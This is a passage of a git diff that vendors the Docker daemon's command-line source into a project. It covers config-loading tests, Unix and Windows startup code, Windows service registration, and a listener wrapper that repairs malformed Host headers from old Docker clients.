"log-driver": "syslog"}` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.CommonTLSOptions.CAFile, "/etc/certs/ca.pem") + assert.Equal(t, loadedConfig.LogConfig.Type, "syslog") +} + +func TestLoadDaemonConfigWithRegistryOptions(t *testing.T) { + content := `{ + "registry-mirrors": ["https://mirrors.docker.com"], + "insecure-registries": ["https://insecure.docker.com"] + }` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + + assert.Equal(t, len(loadedConfig.Mirrors), 1) + assert.Equal(t, len(loadedConfig.InsecureRegistries), 1) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go new file mode 100644 index 0000000000..bdce98bd26 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go @@ -0,0 +1,137 @@ +// +build !windows,!solaris + +package main + +import ( + "fmt" + "net" + "os" + "os/signal" + "path/filepath" + "strconv" + "syscall" + + "github.com/docker/docker/cmd/dockerd/hack" + "github.com/docker/docker/daemon" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/system" + "github.com/docker/libnetwork/portallocator" +) + +const defaultDaemonConfigFile = "/etc/docker/daemon.json" + +// currentUserIsOwner checks whether the current user is the owner of the given +// file. +func currentUserIsOwner(f string) bool { + if fileInfo, err := system.Stat(f); err == nil && fileInfo != nil { + if int(fileInfo.UID()) == os.Getuid() { + return true + } + } + return false +} + +// setDefaultUmask sets the umask to 0022 to avoid problems +// caused by custom umask +func setDefaultUmask() error { + desiredUmask := 0022 + syscall.Umask(desiredUmask) + if umask := syscall.Umask(desiredUmask); umask != desiredUmask { + return fmt.Errorf("failed to set umask: expected %#o, got %#o", desiredUmask, umask) + } + + return nil +} + +func getDaemonConfDir(_ string) string { + return "/etc/docker" +} + +// setupConfigReloadTrap configures the USR2 signal to reload the configuration. +func (cli *DaemonCli) setupConfigReloadTrap() { + c := make(chan os.Signal, 1) + signal.Notify(c, syscall.SIGHUP) + go func() { + for range c { + cli.reloadConfig() + } + }() +} + +func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption { + opts := []libcontainerd.RemoteOption{ + libcontainerd.WithDebugLog(cli.Config.Debug), + libcontainerd.WithOOMScore(cli.Config.OOMScoreAdjust), + } + if cli.Config.ContainerdAddr != "" { + opts = append(opts, libcontainerd.WithRemoteAddr(cli.Config.ContainerdAddr)) + } else { + opts = append(opts, libcontainerd.WithStartDaemon(true)) + } + if daemon.UsingSystemd(cli.Config) { + args := []string{"--systemd-cgroup=true"} + opts = append(opts, libcontainerd.WithRuntimeArgs(args)) + } + if cli.Config.LiveRestoreEnabled { + opts = append(opts, libcontainerd.WithLiveRestore(true)) + } + opts = append(opts, libcontainerd.WithRuntimePath(daemon.DefaultRuntimeBinary)) + return opts +} + +// getLibcontainerdRoot gets the root directory for libcontainerd/containerd to +// store their state. +func (cli *DaemonCli) getLibcontainerdRoot() string { + return filepath.Join(cli.Config.ExecRoot, "libcontainerd") +} + +// getSwarmRunRoot gets the root directory for swarm to store runtime state +// For example, the control socket +func (cli *DaemonCli) getSwarmRunRoot() string { + return filepath.Join(cli.Config.ExecRoot, "swarm") +} + +// allocateDaemonPort ensures that there are no containers +// that try to use any port allocated for the docker server. +func allocateDaemonPort(addr string) error { + host, port, err := net.SplitHostPort(addr) + if err != nil { + return err + } + + intPort, err := strconv.Atoi(port) + if err != nil { + return err + } + + var hostIPs []net.IP + if parsedIP := net.ParseIP(host); parsedIP != nil { + hostIPs = append(hostIPs, parsedIP) + } else if hostIPs, err = net.LookupIP(host); err != nil { + return fmt.Errorf("failed to lookup %s address in host specification", host) + } + + pa := portallocator.Get() + for _, hostIP := range hostIPs { + if _, err := pa.RequestPort(hostIP, "tcp", intPort); err != nil { + return fmt.Errorf("failed to allocate daemon listening port %d (err: %v)", intPort, err) + } + } + return nil +} + +// notifyShutdown is called after the daemon shuts down but before the process exits. +func notifyShutdown(err error) { +} + +func wrapListeners(proto string, ls []net.Listener) []net.Listener { + switch proto { + case "unix": + ls[0] = &hack.MalformedHostHeaderOverride{ls[0]} + case "fd": + for i := range ls { + ls[i] = &hack.MalformedHostHeaderOverride{ls[i]} + } + } + return ls +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go new file mode 100644 index 0000000000..d66dba77e1 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go @@ -0,0 +1,114 @@ +// +build !windows,!solaris + +// TODO: Create new file for Solaris which tests config parameters +// as described in daemon/config_solaris.go + +package main + +import ( + "github.com/docker/docker/daemon" + "github.com/docker/docker/pkg/testutil/assert" + "github.com/docker/docker/pkg/testutil/tempfile" + "testing" +) + +func TestLoadDaemonCliConfigWithDaemonFlags(t *testing.T) { + content := `{"log-opts": {"max-size": "1k"}}` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + opts.common.Debug = true + opts.common.LogLevel = "info" + assert.NilError(t, opts.flags.Set("selinux-enabled", "true")) + + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + + assert.Equal(t, loadedConfig.Debug, true) + assert.Equal(t, loadedConfig.LogLevel, "info") + assert.Equal(t, loadedConfig.EnableSelinuxSupport, true) + assert.Equal(t, loadedConfig.LogConfig.Type, "json-file") + assert.Equal(t, loadedConfig.LogConfig.Config["max-size"], "1k") +} + +func TestLoadDaemonConfigWithNetwork(t *testing.T) { + content := `{"bip": "127.0.0.2", "ip": "127.0.0.1"}` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + + assert.Equal(t, loadedConfig.IP, "127.0.0.2") + assert.Equal(t, loadedConfig.DefaultIP.String(), "127.0.0.1") +} + +func TestLoadDaemonConfigWithMapOptions(t *testing.T) { + content := `{ + "cluster-store-opts": {"kv.cacertfile": "/var/lib/docker/discovery_certs/ca.pem"}, + "log-opts": {"tag": "test"} +}` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.NotNil(t, loadedConfig.ClusterOpts) + + expectedPath := "/var/lib/docker/discovery_certs/ca.pem" + assert.Equal(t, loadedConfig.ClusterOpts["kv.cacertfile"], expectedPath) + assert.NotNil(t, loadedConfig.LogConfig.Config) + assert.Equal(t, loadedConfig.LogConfig.Config["tag"], "test") +} + +func TestLoadDaemonConfigWithTrueDefaultValues(t *testing.T) { + content := `{ "userland-proxy": false }` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.NotNil(t, loadedConfig.ClusterOpts) + + assert.Equal(t, loadedConfig.EnableUserlandProxy, false) + + // make sure reloading doesn't generate configuration + // conflicts after normalizing boolean values. + reload := func(reloadedConfig *daemon.Config) { + assert.Equal(t, reloadedConfig.EnableUserlandProxy, false) + } + assert.NilError(t, daemon.ReloadConfiguration(opts.configFile, opts.flags, reload)) +} + +func TestLoadDaemonConfigWithTrueDefaultValuesLeaveDefaults(t *testing.T) { + tempFile := tempfile.NewTempFile(t, "config", `{}`) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.NotNil(t, loadedConfig.ClusterOpts) + + assert.Equal(t, loadedConfig.EnableUserlandProxy, true) +} + +func TestLoadDaemonConfigWithLegacyRegistryOptions(t *testing.T) { + content := `{"disable-legacy-registry": true}` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.V2Only, true) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go new file mode 100644 index 0000000000..4cccd32688 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go @@ -0,0 +1,92 @@ +package main + +import ( + "fmt" + "net" + "os" + "path/filepath" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/system" +) + +var defaultDaemonConfigFile = "" + +// currentUserIsOwner checks whether the current user is the owner of the given +// file. +func currentUserIsOwner(f string) bool { + return false +} + +// setDefaultUmask doesn't do anything on windows +func setDefaultUmask() error { + return nil +} + +func getDaemonConfDir(root string) string { + return filepath.Join(root, `\config`) +} + +// notifySystem sends a message to the host when the server is ready to be used +func notifySystem() { + if service != nil { + err := service.started() + if err != nil { + logrus.Fatal(err) + } + } +} + +// notifyShutdown is called after the daemon shuts down but before the process exits. +func notifyShutdown(err error) { + if service != nil { + if err != nil { + logrus.Fatal(err) + } + service.stopped(err) + } +} + +// setupConfigReloadTrap configures a Win32 event to reload the configuration. +func (cli *DaemonCli) setupConfigReloadTrap() { + go func() { + sa := syscall.SecurityAttributes{ + Length: 0, + } + ev := "Global\\docker-daemon-config-" + fmt.Sprint(os.Getpid()) + if h, _ := system.CreateEvent(&sa, false, false, ev); h != 0 { + logrus.Debugf("Config reload - waiting signal at %s", ev) + for { + syscall.WaitForSingleObject(h, syscall.INFINITE) + cli.reloadConfig() + } + } + }() +} + +func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption { + return nil +} + +// getLibcontainerdRoot gets the root directory for libcontainerd to store its +// state. The Windows libcontainerd implementation does not need to write a spec +// or state to disk, so this is a no-op. +func (cli *DaemonCli) getLibcontainerdRoot() string { + return "" +} + +// getSwarmRunRoot gets the root directory for swarm to store runtime state +// For example, the control socket +func (cli *DaemonCli) getSwarmRunRoot() string { + return "" +} + +func allocateDaemonPort(addr string) error { + return nil +} + +func wrapListeners(proto string, ls []net.Listener) []net.Listener { + return ls +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker.go b/vendor/github.com/docker/docker/cmd/dockerd/docker.go new file mode 100644 index 0000000000..60742ae927 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/docker.go @@ -0,0 +1,110 @@ +package main + +import ( + "fmt" + "os" + "path/filepath" + "runtime" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/cli" + cliflags "github.com/docker/docker/cli/flags" + "github.com/docker/docker/daemon" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/reexec" + "github.com/docker/docker/pkg/term" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +type daemonOptions struct { + version bool + configFile string + daemonConfig *daemon.Config + common *cliflags.CommonOptions + flags *pflag.FlagSet +} + +func newDaemonCommand() *cobra.Command { + opts := daemonOptions{ + daemonConfig: daemon.NewConfig(), + common: cliflags.NewCommonOptions(), + } + + cmd := &cobra.Command{ + Use: "dockerd [OPTIONS]", + Short: "A self-sufficient runtime for containers.", + SilenceUsage: true, + SilenceErrors: true, + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + opts.flags = cmd.Flags() + return runDaemon(opts) + }, + } + cli.SetupRootCommand(cmd) + + flags := cmd.Flags() + flags.BoolVarP(&opts.version, "version", "v", false, "Print version information and quit") + flags.StringVar(&opts.configFile, flagDaemonConfigFile, defaultDaemonConfigFile, "Daemon configuration file") + opts.common.InstallFlags(flags) + opts.daemonConfig.InstallFlags(flags) + installServiceFlags(flags) + + return cmd +} + +func runDaemon(opts daemonOptions) error { + if opts.version { + showVersion() + return nil + } + + daemonCli := NewDaemonCli() + + // Windows specific settings as these are not defaulted. + if runtime.GOOS == "windows" { + if opts.daemonConfig.Pidfile == "" { + opts.daemonConfig.Pidfile = filepath.Join(opts.daemonConfig.Root, "docker.pid") + } + if opts.configFile == "" { + opts.configFile = filepath.Join(opts.daemonConfig.Root, `config\daemon.json`) + } + } + + // On Windows, this may be launching as a service or with an option to + // register the service. + stop, err := initService(daemonCli) + if err != nil { + logrus.Fatal(err) + } + + if stop { + return nil + } + + err = daemonCli.start(opts) + notifyShutdown(err) + return err +} + +func showVersion() { + fmt.Printf("Docker version %s, build %s\n", dockerversion.Version, dockerversion.GitCommit) +} + +func main() { + if reexec.Init() { + return + } + + // Set terminal emulation based on platform as required. + _, stdout, stderr := term.StdStreams() + logrus.SetOutput(stderr) + + cmd := newDaemonCommand() + cmd.SetOutput(stdout) + if err := cmd.Execute(); err != nil { + fmt.Fprintf(stderr, "%s\n", err) + os.Exit(1) + } +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go new file mode 100644 index 0000000000..19c5587cb6 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go @@ -0,0 +1,18 @@ +package main + +import ( + "sync/atomic" + + _ "github.com/docker/docker/autogen/winresources/dockerd" +) + +//go:cgo_import_dynamic main.dummy CommandLineToArgvW%2 "shell32.dll" + +var dummy uintptr + +func init() { + // Ensure that this import is not removed by the linker. This is used to + // ensure that shell32.dll is loaded by the system loader, preventing + // go#15286 from triggering on Nano Server TP5. + atomic.LoadUintptr(&dummy) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go new file mode 100644 index 0000000000..d4aa3ddd73 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go @@ -0,0 +1,121 @@ +// +build !windows + +package hack + +import "net" + +// MalformedHostHeaderOverride is a wrapper to be able +// to overcome the 400 Bad request coming from old docker +// clients that send an invalid Host header. +type MalformedHostHeaderOverride struct { + net.Listener +} + +// MalformedHostHeaderOverrideConn wraps the underlying unix +// connection and keeps track of the first read from http.Server +// which just reads the headers. +type MalformedHostHeaderOverrideConn struct { + net.Conn + first bool +} + +var closeConnHeader = []byte("\r\nConnection: close\r") + +// Read reads the first *read* request from http.Server to inspect +// the Host header. If the Host starts with / then we're talking to +// an old docker client which send an invalid Host header. To not +// error out in http.Server we rewrite the first bytes of the request +// to sanitize the Host header itself. +// In case we're not dealing with old docker clients the data is just passed +// to the server w/o modification. +func (l *MalformedHostHeaderOverrideConn) Read(b []byte) (n int, err error) { + // http.Server uses a 4k buffer + if l.first && len(b) == 4096 { + // This keeps track of the first read from http.Server which just reads + // the headers + l.first = false + // The first read of the connection by http.Server is done limited to + // DefaultMaxHeaderBytes (usually 1 << 20) + 4096. + // Here we do the first read which gets us all the http headers to + // be inspected and modified below. + c, err := l.Conn.Read(b) + if err != nil { + return c, err + } + + var ( + start, end int + firstLineFeed = -1 + buf []byte + ) + for i := 0; i <= c-1-7; i++ { + if b[i] == '\n' && firstLineFeed == -1 { + firstLineFeed = i + } + if b[i] != '\n' { + continue + } + + if b[i+1] == '\r' && b[i+2] == '\n' { + return c, nil + } + + if b[i+1] != 'H' { + continue + } + if b[i+2] != 'o' { + continue + } + if b[i+3] != 's' { + continue + } + if b[i+4] != 't' { + continue + } + if b[i+5] != ':' { + continue + } + if b[i+6] != ' ' { + continue + } + if b[i+7] != '/' { + continue + } + // ensure clients other than the docker clients do not get this hack + if i != firstLineFeed { + return c, nil + } + start = i + 7 + // now find where the value ends + for ii, bbb := range b[start:c] { + if bbb == '\n' { + end = start + ii + break + } + } + buf = make([]byte, 0, c+len(closeConnHeader)-(end-start)) + // strip the value of the host header and + // inject `Connection: close` to ensure we don't reuse this connection + buf = append(buf, b[:start]...) + buf = append(buf, closeConnHeader...) + buf = append(buf, b[end:c]...) + copy(b, buf) + break + } + if len(buf) == 0 { + return c, nil + } + return len(buf), nil + } + return l.Conn.Read(b) +} + +// Accept makes the listener accepts connections and wraps the connection +// in a MalformedHostHeaderOverrideConn initilizing first to true. +func (l *MalformedHostHeaderOverride) Accept() (net.Conn, error) { + c, err := l.Listener.Accept() + if err != nil { + return c, err + } + return &MalformedHostHeaderOverrideConn{c, true}, nil +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go new file mode 100644 index 0000000000..1a0a60baf3 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go @@ -0,0 +1,124 @@ +// +build !windows + +package hack + +import ( + "bytes" + "io" + "net" + "strings" + "testing" +) + +type bufConn struct { + net.Conn + buf *bytes.Buffer +} + +func (bc *bufConn) Read(b []byte) (int, error) { + return bc.buf.Read(b) +} + +func TestHeaderOverrideHack(t *testing.T) { + tests := [][2][]byte{ + { + []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\n"), + []byte("GET /foo\nHost: \r\nConnection: close\r\nUser-Agent: Docker\r\n\r\n"), + }, + { + []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\nFoo: Bar\r\n"), + []byte("GET /foo\nHost: \r\nConnection: close\r\nUser-Agent: Docker\nFoo: Bar\r\n"), + }, + { + []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\ntest something!"), + []byte("GET /foo\nHost: \r\nConnection: close\r\nUser-Agent: Docker\r\n\r\ntest something!"), + }, + { + []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\ntest something! " + strings.Repeat("test", 15000)), + []byte("GET /foo\nHost: \r\nConnection: close\r\nUser-Agent: Docker\r\n\r\ntest something! " + strings.Repeat("test", 15000)), + }, + { + []byte("GET /foo\nFoo: Bar\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\n"), + []byte("GET /foo\nFoo: Bar\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\n"), + }, + } + + // Test for https://github.com/docker/docker/issues/23045 + h0 := "GET /foo\nUser-Agent: Docker\r\n\r\n" + h0 = h0 + strings.Repeat("a", 4096-len(h0)-1) + "\n" + tests = append(tests, [2][]byte{[]byte(h0), []byte(h0)}) + + for _, pair := range tests { + read := make([]byte, 4096) + client := &bufConn{ + buf: bytes.NewBuffer(pair[0]), + } + l := MalformedHostHeaderOverrideConn{client, true} + + n, err := l.Read(read) + if err != nil && err != io.EOF { + t.Fatalf("read: %d - %d, err: %v\n%s", n, len(pair[0]), err, string(read[:n])) + } + if !bytes.Equal(read[:n], pair[1][:n]) { + t.Fatalf("\n%s\n%s\n", read[:n], pair[1][:n]) + } + } +} + +func BenchmarkWithHack(b *testing.B) { + client, srv := net.Pipe() + done := make(chan struct{}) + req := []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\n") + read := make([]byte, 4096) + b.SetBytes(int64(len(req) * 30)) + + l := MalformedHostHeaderOverrideConn{client, true} + go func() { + for { + if _, err := srv.Write(req); err != nil { + srv.Close() + break + } + l.first = true // make sure each subsequent run uses the hack parsing + } + close(done) + }() + + for i := 0; i < b.N; i++ { + for i := 0; i < 30; i++ { + if n, err := l.Read(read); err != nil && err != io.EOF { + b.Fatalf("read: %d - %d, err: %v\n%s", n, len(req), err, string(read[:n])) + } + } + } + l.Close() + <-done +} + +func BenchmarkNoHack(b *testing.B) { + client, srv := net.Pipe() + done := make(chan struct{}) + req := []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\n") + read := make([]byte, 4096) + b.SetBytes(int64(len(req) * 30)) + + go func() { + for { + if _, err := srv.Write(req); err != nil { + srv.Close() + break + } + } + close(done) + }() + + for i := 0; i < b.N; i++ { + for i := 0; i < 30; i++ { + if _, err := client.Read(read); err != nil && err != io.EOF { + b.Fatal(err) + } + } + } + client.Close() + <-done +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/metrics.go b/vendor/github.com/docker/docker/cmd/dockerd/metrics.go new file mode 100644 index 0000000000..0c8860408b --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/metrics.go @@ -0,0 +1,27 @@ +package main + +import ( + "net" + "net/http" + + "github.com/Sirupsen/logrus" + metrics "github.com/docker/go-metrics" +) + +func startMetricsServer(addr string) error { + if err := allocateDaemonPort(addr); err != nil { + return err + } + l, err := net.Listen("tcp", addr) + if err != nil { + return err + } + mux := http.NewServeMux() + mux.Handle("/metrics", metrics.Handler()) + go func() { + if err := http.Serve(l, mux); err != nil { + logrus.Errorf("serve metrics api: %s", err) + } + }() + return nil +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go b/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go new file mode 100644 index 0000000000..64ad7fcaa0 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go @@ -0,0 +1,14 @@ +// +build !windows + +package main + +import ( + "github.com/spf13/pflag" +) + +func initService(daemonCli *DaemonCli) (bool, error) { + return false, nil +} + +func installServiceFlags(flags *pflag.FlagSet) { +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go new file mode 100644 index 0000000000..dd37abcf3c --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go @@ -0,0 +1,426 @@ +package main + +import ( + "bytes" + "errors" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "syscall" + "time" + "unsafe" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/system" + "github.com/spf13/pflag" + "golang.org/x/sys/windows" + "golang.org/x/sys/windows/svc" + "golang.org/x/sys/windows/svc/debug" + "golang.org/x/sys/windows/svc/eventlog" + "golang.org/x/sys/windows/svc/mgr" +) + +var ( + flServiceName *string + flRegisterService *bool + flUnregisterService *bool + flRunService *bool + + setStdHandle = windows.NewLazySystemDLL("kernel32.dll").NewProc("SetStdHandle") + oldStderr syscall.Handle + panicFile *os.File + + service *handler +) + +const ( + // These should match the values in event_messages.mc. + eventInfo = 1 + eventWarn = 1 + eventError = 1 + eventDebug = 2 + eventPanic = 3 + eventFatal = 4 + + eventExtraOffset = 10 // Add this to any event to get a string that supports extended data +) + +func installServiceFlags(flags *pflag.FlagSet) { + flServiceName = flags.String("service-name", "docker", "Set the Windows service name") + flRegisterService = flags.Bool("register-service", false, "Register the service and exit") + flUnregisterService = flags.Bool("unregister-service", false, "Unregister the service and exit") + flRunService = flags.Bool("run-service", false, "") + flags.MarkHidden("run-service") +} + +type handler struct { + tosvc chan bool + fromsvc chan error + daemonCli *DaemonCli +} + +type etwHook struct { + log *eventlog.Log +} + +func (h *etwHook) Levels() []logrus.Level { + return []logrus.Level{ + logrus.PanicLevel, + logrus.FatalLevel, + logrus.ErrorLevel, + logrus.WarnLevel, + logrus.InfoLevel, + logrus.DebugLevel, + } +} + +func (h *etwHook) Fire(e *logrus.Entry) error { + var ( + etype uint16 + eid uint32 + ) + + switch e.Level { + case logrus.PanicLevel: + etype = windows.EVENTLOG_ERROR_TYPE + eid = eventPanic + case logrus.FatalLevel: + etype = windows.EVENTLOG_ERROR_TYPE + eid = eventFatal + case logrus.ErrorLevel: + etype = windows.EVENTLOG_ERROR_TYPE + eid = eventError + case logrus.WarnLevel: + etype = windows.EVENTLOG_WARNING_TYPE + eid = eventWarn + case logrus.InfoLevel: + etype = windows.EVENTLOG_INFORMATION_TYPE + eid = eventInfo + case logrus.DebugLevel: + etype = windows.EVENTLOG_INFORMATION_TYPE + eid = eventDebug + default: + return errors.New("unknown level") + } + + // If there is additional data, include it as a second string. + exts := "" + if len(e.Data) > 0 { + fs := bytes.Buffer{} + for k, v := range e.Data { + fs.WriteString(k) + fs.WriteByte('=') + fmt.Fprint(&fs, v) + fs.WriteByte(' ') + } + + exts = fs.String()[:fs.Len()-1] + eid += eventExtraOffset + } + + if h.log == nil { + fmt.Fprintf(os.Stderr, "%s [%s]\n", e.Message, exts) + return nil + } + + var ( + ss [2]*uint16 + err error + ) + + ss[0], err = syscall.UTF16PtrFromString(e.Message) + if err != nil { + return err + } + + count := uint16(1) + if exts != "" { + ss[1], err = syscall.UTF16PtrFromString(exts) + if err != nil { + return err + } + + count++ + } + + return windows.ReportEvent(h.log.Handle, etype, 0, eid, 0, count, 0, &ss[0], nil) +} + +func getServicePath() (string, error) { + p, err := exec.LookPath(os.Args[0]) + if err != nil { + return "", err + } + return filepath.Abs(p) +} + +func registerService() error { + p, err := getServicePath() + if err != nil { + return err + } + m, err := mgr.Connect() + if err != nil { + return err + } + defer m.Disconnect() + + depends := []string{} + + // This dependency is required on build 14393 (RS1) + // it is added to the platform in newer builds + if system.GetOSVersion().Build == 14393 { + depends = append(depends, "ConDrv") + } + + c := mgr.Config{ + ServiceType: windows.SERVICE_WIN32_OWN_PROCESS, + StartType: mgr.StartAutomatic, + ErrorControl: mgr.ErrorNormal, + Dependencies: depends, + DisplayName: "Docker Engine", + } + + // Configure the service to launch with the arguments that were just passed. + args := []string{"--run-service"} + for _, a := range os.Args[1:] { + if a != "--register-service" && a != "--unregister-service" { + args = append(args, a) + } + } + + s, err := m.CreateService(*flServiceName, p, c, args...) + if err != nil { + return err + } + defer s.Close() + + // See http://stackoverflow.com/questions/35151052/how-do-i-configure-failure-actions-of-a-windows-service-written-in-go + const ( + scActionNone = 0 + scActionRestart = 1 + scActionReboot = 2 + scActionRunCommand = 3 + + serviceConfigFailureActions = 2 + ) + + type serviceFailureActions struct { + ResetPeriod uint32 + RebootMsg *uint16 + Command *uint16 + ActionsCount uint32 + Actions uintptr + } + + type scAction struct { + Type uint32 + Delay uint32 + } + t := []scAction{ + {Type: scActionRestart, Delay: uint32(60 * time.Second / time.Millisecond)}, + {Type: scActionRestart, Delay: uint32(60 * time.Second / time.Millisecond)}, + {Type: scActionNone}, + } + lpInfo := serviceFailureActions{ResetPeriod: uint32(24 * time.Hour / time.Second), ActionsCount: uint32(3), Actions: uintptr(unsafe.Pointer(&t[0]))} + err = windows.ChangeServiceConfig2(s.Handle, serviceConfigFailureActions, (*byte)(unsafe.Pointer(&lpInfo))) + if err != nil { + return err + } + + err = eventlog.Install(*flServiceName, p, false, eventlog.Info|eventlog.Warning|eventlog.Error) + if err != nil { + return err + } + + return nil +} + +func unregisterService() error { + m, err := mgr.Connect() + if err != nil { + return err + } + defer m.Disconnect() + + s, err := m.OpenService(*flServiceName) + if err != nil { + return err + } + defer s.Close() + + eventlog.Remove(*flServiceName) + err = s.Delete() + if err != nil { + return err + } + return nil +} + +func initService(daemonCli *DaemonCli) (bool, error) { + if *flUnregisterService { + if *flRegisterService { + return true, errors.New("--register-service and --unregister-service cannot be used together") + } + return true, unregisterService() + } + + if *flRegisterService { + return true, registerService() + } + + if !*flRunService { + return false, nil + } + + interactive, err := svc.IsAnInteractiveSession() + if err != nil { + return false, err + } + + h := &handler{ + tosvc: make(chan bool), + fromsvc: make(chan error), + daemonCli: daemonCli, + } + + var log *eventlog.Log + if !interactive { + log, err = eventlog.Open(*flServiceName) + if err != nil { + return false, err + } + } + + logrus.AddHook(&etwHook{log}) + logrus.SetOutput(ioutil.Discard) + + service = h + go func() { + if interactive { + err = debug.Run(*flServiceName, h) + } else { + err = svc.Run(*flServiceName, h) + } + + h.fromsvc <- err + }() + + // Wait for the first signal from the service handler. + err = <-h.fromsvc + if err != nil { + return false, err + } + return false, nil +} + +func (h *handler) started() error { + // This must be delayed until daemonCli initializes Config.Root + err := initPanicFile(filepath.Join(h.daemonCli.Config.Root, "panic.log")) + if err != nil { + return err + } + + h.tosvc <- false + return nil +} + +func (h *handler) stopped(err error) { + logrus.Debugf("Stopping service: %v", err) + h.tosvc <- err != nil + <-h.fromsvc +} + +func (h *handler) Execute(_ []string, r <-chan svc.ChangeRequest, s chan<- svc.Status) (bool, uint32) { + s <- svc.Status{State: svc.StartPending, Accepts: 0} + // Unblock initService() + h.fromsvc <- nil + + // Wait for initialization to complete. + failed := <-h.tosvc + if failed { + logrus.Debug("Aborting service start due to failure during initialization") + return true, 1 + } + + s <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown | svc.Accepted(windows.SERVICE_ACCEPT_PARAMCHANGE)} + logrus.Debug("Service running") +Loop: + for { + select { + case failed = <-h.tosvc: + break Loop + case c := <-r: + switch c.Cmd { + case svc.Cmd(windows.SERVICE_CONTROL_PARAMCHANGE): + h.daemonCli.reloadConfig() + case svc.Interrogate: + s <- c.CurrentStatus + case svc.Stop, svc.Shutdown: + s <- svc.Status{State: svc.StopPending, Accepts: 0} + h.daemonCli.stop() + } + } + } + + removePanicFile() + if failed { + return true, 1 + } + return false, 0 +} + +func initPanicFile(path string) error { + var err error + panicFile, err = os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0) + if err != nil { + return err + } + + st, err := panicFile.Stat() + if err != nil { + return err + } + + // If there are contents in the file already, move the file out of the way + // and replace it. + if st.Size() > 0 { + panicFile.Close() + os.Rename(path, path+".old") + 